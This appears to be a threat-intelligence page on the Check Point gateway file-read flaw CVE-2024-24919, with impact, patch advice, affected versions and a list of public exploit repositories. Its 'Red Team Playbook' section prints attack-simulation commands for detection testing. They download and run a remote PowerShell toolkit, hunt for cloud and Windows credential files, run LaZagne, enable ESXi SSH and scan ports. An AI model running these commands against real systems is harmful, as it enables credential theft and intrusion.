CVE-2024-24919
Overview
This vulnerability is an information disclosure flaw rooted in improper access control within Check Point Security Gateway components. The issue arises from insecure handling of requests to specific endpoints exposed by the remote Access VPN and Mobile Access Software Blades. The affected components include Check Point Quantum Gateway, Spark Gateway firmware, and CloudGuard Network Security software, which improperly process unauthenticated POST requests, allowing unauthorized file read access.
Vulnerability Description
Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available.
Impact
An unauthenticated attacker connected to the internet can exploit this vulnerability to read arbitrary files on the affected Check Point Security Gateways, including sensitive configuration files and credential stores. No prior authentication or user interaction is required, enabling potential exposure of critical security information. This unauthorized disclosure can facilitate further attacks such as credential theft, network reconnaissance, and lateral movement within the protected environment, leading to significant data breaches and operational compromise.
Solution
Apply the security fix provided by Check Point as detailed in their advisory SK182336 and SK182337. Specifically, upgrade affected products to firmware versions beyond R81 where the vulnerability is mitigated. Refer to the official Check Point support page https://support.checkpoint.com/results/sk/sk182336 for patch installation instructions and version-specific guidance. No alternative workarounds are documented; timely patching is recommended to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Check Point Security Gateways arises from improper handling of certain information when remote access VPN or Mobile Access Software Blades are enabled. This flaw potentially allows unauthorized users to gain access to sensitive data transmitted through the affected devices. The issue is particularly concerning given that these security gateways are designed to protect networks from external threats. The presence of this vulnerability indicates a lapse in the security measures that should be in place to safeguard critical information, which could lead to significant breaches if exploited.
Attack vectors for this vulnerability primarily involve remote access scenarios, where an attacker could leverage the compromised security mechanisms to intercept data. Once connected to the internet, an attacker could exploit the vulnerability to read sensitive information that should be protected by the security gateway. This could include user credentials, configuration settings, or other confidential data that could be used to further compromise the network. The exploitation of this vulnerability could occur through various methods, including phishing attacks to gain initial access or direct exploitation of the gateway's remote access features.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Check Point's security solutions for their network integrity. If attackers successfully exploit this flaw, they could gain access to sensitive corporate data, leading to data breaches that could result in financial loss, reputational damage, and regulatory penalties. The business risks associated with such incidents are compounded by the potential for further attacks, as compromised credentials could allow attackers to move laterally within the network, escalating their access and control over critical systems.
To detect and mitigate this vulnerability, organizations should prioritize the implementation of the available security fix provided by Check Point. Regular updates and patch management are essential practices to ensure that all systems are protected against known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify any potential weaknesses in their configurations. Monitoring network traffic for unusual patterns can also aid in the early detection of exploitation attempts. Furthermore, educating users about secure remote access practices can help reduce the likelihood of successful attacks.
In conclusion, the vulnerability affecting Check Point Security Gateways presents a significant threat to organizations utilizing these devices for remote access. The potential for unauthorized data access underscores the importance of robust security measures and timely updates. By adopting comprehensive detection and mitigation strategies, organizations can protect themselves against the risks associated with this vulnerability, ensuring the integrity and confidentiality of their sensitive information.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-24919, indicating increased adversary interest and potential reconnaissance efforts targeting Check Point Security Gateways. This uptick in telemetry, while not accompanied by a rise in the Exploit Prediction Scoring System (EPSS) score, suggests that threat actors are actively probing vulnerable systems, possibly to identify exploitable targets ahead of more widespread exploitation. Concurrently, new proof-of-concept exploits have surfaced publicly, lowering the technical barrier for malicious actors to leverage this vulnerability. The presence of ransomware groups associated with this vulnerability further elevates the risk profile, as these actors may integrate the exploit into their attack chains to facilitate data exfiltration or lateral movement. Collectively, these developments underscore a heightened threat environment where the likelihood of targeted attacks exploiting CVE-2024-24919 has increased, warranting continued vigilance. Although the overall EPSS score remains stable, the qualitative surge in activity and expanding exploit availability justify maintaining the vulnerability’s high-risk classification.
Update 2 — June 07, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-24919, accompanied by the emergence of new proof-of-concept exploits publicly available on multiple platforms. This expansion of the exploit landscape lowers the barrier for threat actors to weaponize the vulnerability, potentially accelerating its adoption in attack campaigns. Although the overall exploit prediction scoring remains stable, the uptick in telemetry and broader exploit accessibility signal a growing operational interest, particularly among ransomware-affiliated groups known to leverage such vulnerabilities for initial access and lateral movement. Consequently, this development reinforces the high-risk classification of CVE-2024-24919 and underscores the necessity for sustained monitoring as adversaries refine their tactics to exploit this weakness.
Update 3 — July 05, 2026
CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2024-24919, accompanied by the emergence of additional publicly available proof-of-concept tools. This expanded exploit landscape lowers the technical barrier for threat actors, facilitating broader operational use. Our telemetry indicates that while overall exploitation volume remains steady, the quality and accessibility of attack resources have improved, enabling more adversaries—including ransomware-affiliated groups—to incorporate this vulnerability into their campaigns. This development underscores a subtle but meaningful shift in attacker behavior, signaling increased confidence and capability in leveraging this weakness. Consequently, the risk profile for CVE-2024-24919 is elevated, reinforcing its classification as a high-severity threat that demands continued vigilance.
Affected Products (12)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Checkpoint | Quantum Spark Firmware | r80.40 |
cpe:2.3:o:checkpoint:quantum_spark_firmware:r80.40:*:*:*:*:*:*:*
|
|
|
Checkpoint | Quantum Spark Firmware | r81 |
cpe:2.3:o:checkpoint:quantum_spark_firmware:r81:*:*:*:*:*:*:*
|
|
|
Checkpoint | Quantum Security Gateway Firmware | r80.40 |
cpe:2.3:o:checkpoint:quantum_security_gateway_firmware:r80.40:*:*:*:*:*:*:*
|
|
|
Checkpoint | Cloudguard Network Security | r80.40 |
cpe:2.3:a:checkpoint:cloudguard_network_security:r80.40:*:*:*:*:*:*:*
|
|
|
Checkpoint | Cloudguard Network Security | r81 |
cpe:2.3:a:checkpoint:cloudguard_network_security:r81:*:*:*:*:*:*:*
|
|
|
Checkpoint | Cloudguard Network Security | r81.10 |
cpe:2.3:a:checkpoint:cloudguard_network_security:r81.10:*:*:*:*:*:*:*
|
|
|
Checkpoint | Cloudguard Network Security | r81.20 |
cpe:2.3:a:checkpoint:cloudguard_network_security:r81.20:*:*:*:*:*:*:*
|
|
|
Checkpoint | Quantum Security Gateway Firmware | r81.20 |
cpe:2.3:o:checkpoint:quantum_security_gateway_firmware:r81.20:*:*:*:*:*:*:*
|
|
|
Checkpoint | Quantum Security Gateway Firmware | r81.10 |
cpe:2.3:o:checkpoint:quantum_security_gateway_firmware:r81.10:*:*:*:*:*:*:*
|
|
|
Checkpoint | Quantum Security Gateway Firmware | r81 |
cpe:2.3:o:checkpoint:quantum_security_gateway_firmware:r81:*:*:*:*:*:*:*
|
|
|
Checkpoint | Quantum Spark Firmware | r81.10 |
cpe:2.3:o:checkpoint:quantum_spark_firmware:r81.10:*:*:*:*:*:*:*
|
|
|
Checkpoint | Quantum Spark Firmware | r80.20 |
cpe:2.3:o:checkpoint:quantum_spark_firmware:r80.20:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Check Point Security Gateway Arbitrary File Read
auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919
|
remmons-r7 | Unknown | - | View |
GitHub PoCs (61)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
seed1337/CVE-2024-24919-POC
|
seed1337 | 47 | 11 | 2024-05-31 | View |
|
ifconfig-me/CVE-2024-24919-Bulk-Scanner
CVE-2024-24919 [Check Point Security Gateway Information Disclosure]
|
ifconfig-me | 31 | 6 | 2024-06-01 | View |
|
RevoltSecurities/CVE-2024-24919
An Vulnerability detection and Exploitation tool for CVE-2024-24919
|
RevoltSecurities | 25 | 6 | 2024-05-31 | View |
|
GoatSecurity/CVE-2024-24919
CVE-2024-24919 exploit
|
GoatSecurity | 20 | 11 | 2024-05-31 | View |
|
un9nplayer/CVE-2024-24919
This repository contains a proof-of-concept (PoC) exploit for CVE-2024-24919, a critical vulnerability discovered in Che...
|
un9nplayer | 16 | 3 | 2024-05-31 | View |
|
LucasKatashi/CVE-2024-24919
CVE-2024-24919 Exploit PoC
|
LucasKatashi | 12 | 5 | 2024-05-30 | View |
|
verylazytech/CVE-2024-24919
POC - CVE-2024–24919 - Check Point Security Gateways
|
verylazytech | 9 | 3 | 2024-06-09 | View |
|
0nin0hanz0/CVE-2024-24919-PoC
|
0nin0hanz0 | 11 | 0 | 2024-06-03 | View |
|
c3rrberu5/CVE-2024-24919
Nuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.
|
c3rrberu5 | 7 | 2 | 2024-05-30 | View |
|
geniuszly/CVE-2024-24919
PoC script for CVE-2024-24919 vulnerability. It scans a list of target URLs to identify security issues by sending HTTP ...
|
geniuszly | 6 | 0 | 2024-09-29 | View |
|
GuayoyoCyber/CVE-2024-24919
Nmap script to check vulnerability CVE-2024-24919
|
GuayoyoCyber | 4 | 2 | 2024-06-03 | View |
|
emanueldosreis/CVE-2024-24919
POC exploit for CVE-2024-24919 information leakage
|
emanueldosreis | 5 | 1 | 2024-05-30 | View |
|
zam89/CVE-2024-24919
Simple POC Python script that check & leverage Check Point CVE-2024-24919 vulnerability (Wrong Check Point)
|
zam89 | 4 | 1 | 2024-05-31 | View |
|
smackerdodi/CVE-2024-24919-nuclei-templater
Nuclei template for CVE-2024-24919
|
smackerdodi | 5 | 0 | 2024-05-31 | View |
|
bigb0x/CVE-2024-24919-Sniper
CVE-2024-24919 Sniper - A powerful tool for scanning Check Point Security Gateway CVE-2024-24919 vulnerability. Supports...
|
bigb0x | 3 | 1 | 2024-06-02 | View |
|
Bytenull00/CVE-2024-24919
Quick and simple script that takes as input a file with multiple URLs to check for the CVE-2024-24919 vulnerability in C...
|
Bytenull00 | 3 | 0 | 2024-05-30 | View |
|
GlobalsecureAcademy/CVE-2024-24919
Exploit tool to validate CVE-2024-24919 vulnerability on Checkpoint Firewall VPNs
|
GlobalsecureAcademy | 3 | 0 | 2024-05-31 | View |
|
Rug4lo/CVE-2024-24919-Exploit
CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.
|
Rug4lo | 3 | 0 | 2024-06-03 | View |
|
Cappricio-Securities/CVE-2024-24919
Check Point Security Gateway (LFI)
|
Cappricio-Securities | 2 | 1 | 2024-06-01 | View |
|
starlox0/CVE-2024-24919-POC
A Simple Exploit Code(POC) to Automate CVE-2024–24919
|
starlox0 | 1 | 2 | 2024-06-06 | View |
|
r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN
Herramienta de explotación para explotar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall
|
r4p3c4 | 2 | 0 | 2024-06-01 | View |
|
SalehLardhi/CVE-2024-24919
|
SalehLardhi | 1 | 1 | 2024-06-11 | View |
|
NingXin2002/Check-Point_poc
Check-Point安全网关任意文件读取漏洞(CVE-2024-24919)
|
NingXin2002 | 2 | 0 | 2024-12-21 | View |
|
h21n/CVE-2024-24919
|
h21n | 1 | 0 | 2024-10-09 | View |
|
intel365/CVE-2024-24919
|
intel365 | 1 | 0 | 2024-10-09 | View |
|
kernel364/CVE-2024-24919
|
kernel364 | 1 | 0 | 2024-10-09 | View |
|
satriarizka/CVE-2024-24919
A simple bash and python script to check for the vulnerability CVE-2024-24919
|
satriarizka | 1 | 0 | 2024-05-31 | View |
|
fernandobortotti/CVE-2024-24919
|
fernandobortotti | 1 | 0 | 2024-06-01 | View |
|
r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check
Esta herramienta se utiliza para validar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall
|
r4p3c4 | 1 | 0 | 2024-06-01 | View |
|
mr-kasim-mehar/CVE-2024-24919-Exploit
|
mr-kasim-mehar | 1 | 0 | 2024-06-02 | View |
|
birdlex/cve-2024-24919-checker
|
birdlex | 1 | 0 | 2024-06-03 | View |
|
0xans/CVE-2024-24919
|
0xans | 1 | 0 | 2024-06-04 | View |
|
funixone/CVE-2024-24919---Exploit-Script
|
funixone | 1 | 0 | 2025-02-21 | View |
|
0xYumeko/CVE-2024-24919
|
0xYumeko | 1 | 0 | 2024-05-31 | View |
|
Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN
|
Praison001 | 1 | 0 | 2024-05-31 | View |
|
nexblade12/CVE-2024-24919
|
nexblade12 | 1 | 0 | 2024-05-31 | View |
|
hashdr1ft/SOC_287
SOC287 - Arbitrary File Read on Checkpoint Security Gateway [CVE-2024-24919]
|
hashdr1ft | 1 | 0 | 2025-02-05 | View |
|
voidbroker/CVE-2024-24919
|
voidbroker | 1 | 0 | 2024-10-09 | View |
|
protonnegativo/CVE-2024-24919
Python script to automate the process of finding vulnerable sites for CVE-2024-24919.
|
protonnegativo | 1 | 0 | 2024-06-10 | View |
|
hendprw/CVE-2024-24919
|
hendprw | 0 | 0 | 2024-05-30 | View |
|
am-eid/CVE-2024-24919
|
am-eid | 0 | 0 | 2024-05-30 | View |
|
P3wc0/CVE-2024-24919
|
P3wc0 | 0 | 0 | 2024-05-31 | View |
|
J4F9S5D2Q7/CVE-2024-24919-CHECKPOINT
|
J4F9S5D2Q7 | 0 | 0 | 2024-06-02 | View |
|
nullcult/CVE-2024-24919-Exploit
CVE-2024-24919 exploit that checks more files for better visibility
|
nullcult | 0 | 0 | 2024-06-07 | View |
|
satchhacker/cve-2024-24919
|
satchhacker | 0 | 0 | 2024-06-08 | View |
|
H3KEY/CVE-2024-24919
Hello everyone, I am sharing a modified script from CVE-2024-24919 which can extract paths categorized as critical.
|
H3KEY | 0 | 0 | 2024-07-22 | View |
|
CyberBibs/Event-ID-263-Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-
|
CyberBibs | 0 | 0 | 2025-06-08 | View |
|
Vulnpire/CVE-2024-24919
|
Vulnpire | 0 | 0 | 2024-05-31 | View |
|
YN1337/CVE-2024-24919
Mass scanner for CVE-2024-24919
|
YN1337 | 0 | 0 | 2024-06-01 | View |
|
AhmedMansour93/Event-ID-263-Rule-Name-SOC287---Arbitrary-File-Read-on-Checkpoint-Security-Gateway-CVE-2024-24919-
🔍 Just wrapped up an incident report on a Phishing Alert (Event ID 257, SOC282). Enhancing my expertise in email threat ...
|
AhmedMansour93 | 0 | 0 | 2024-08-31 | View |
|
CyprianAtsyor/CVE-2024-24919-Incident-Report.md
|
CyprianAtsyor | 0 | 0 | 2025-04-25 | View |
|
MacUchegit/Detecting-and-Analyzing-CVE-2024-24919-Exploitation
|
MacUchegit | 0 | 0 | 2025-07-12 | View |
|
0xkalawy/CVE-2024-24919
|
0xkalawy | 0 | 0 | 2024-05-31 | View |
|
nicolvsrlr27/CVE-2024-24919
|
nicolvsrlr27 | 0 | 0 | 2024-06-01 | View |
|
SpiX-7/CVE-2024-24919-POC
|
SpiX-7 | 0 | 0 | 2025-02-26 | View |
|
ejaboz/cve-2024-24919
|
ejaboz | 0 | 0 | 2025-03-24 | View |
|
Expl0itD0g/CVE-2024-24919---Poc
a Proof of Concept of CVE-2024-24919
|
Expl0itD0g | 0 | 0 | 2024-06-02 | View |
|
Tim-Hoekstra/CVE-2024-24919
|
Tim-Hoekstra | 0 | 0 | 2024-06-04 | View |
|
Jutrm/cve-2024-24919
|
Jutrm | 0 | 0 | 2024-07-26 | View |
|
LuisMateo1/Arbitrary-File-Read-CVE-2024-24919
|
LuisMateo1 | 0 | 0 | 2024-08-29 | View |
|
sar-3mar/CVE-2024-24919_POC
It's Proof of Concept on CVE-2024-24919-POC , i made it after it's discoverd
|
sar-3mar | 0 | 0 | 2024-10-28 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 |
| support.checkpoint.com |
GitHub CVE
|
https://support.checkpoint.com/results/sk/sk182336 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-24919 |
| mnemonic.io |
NVD API
Third Party Advisory
|
https://www.mnemonic.io/resources/blog/advisory-check-point-remote-access-vpn-vulnerability-cve-2024-24919/ |